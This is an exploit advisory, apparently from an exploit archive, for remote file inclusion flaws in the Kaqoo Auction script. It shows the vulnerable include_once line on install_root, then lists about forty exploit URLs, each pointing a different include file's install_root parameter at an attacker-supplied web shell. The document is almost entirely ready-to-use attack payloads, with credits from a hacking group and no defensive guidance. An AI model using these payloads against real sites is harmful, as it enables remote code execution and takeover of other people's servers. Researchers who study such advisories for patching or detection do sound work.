Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities

=========================================================================
Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities
=========================================================================




*************************************************************
ScRiPt:-http://kaqoo.com/server/download.php
GrEaTz To:-ToOofa-HaCk.eGy-Alk()mad()z-Bright Dark (All AsB-MaY DisCoverY
ExPloIts GrOup)
Discovered By:- ThE [email protected] <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}   >>
******************************************************************************
Wrong Code:-
include_once("$install_root
********************************************************************************
ExPlOiT:-http://www.SitE.com/include/core/support.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/core/function.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/core/rdal_object.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/core/rdal_editor.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/core/login.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/core/request.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/core/categories.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/item/save.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/item/preview.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/item/edit_item.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/item/new_item.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/item/item_info.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/search.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/item_edit.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/register_succsess.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/context_menu.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/item_repost.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/balance.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/featured.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/user.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/buynow.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/install_complete.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/fees_info.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/user_feedback.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/admin_balance.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/activate.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/user_info.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/member.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/add_bid.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/items_filter.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/my_info.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/register.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/leave_feedback.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/display/user_auctions.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/design/form.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/processor.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/interfaces.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/left_menu.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/login.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/categories.inc.php?install_root=[Shell]
********************************************************************************



#  0day.today [2018-03-06]  #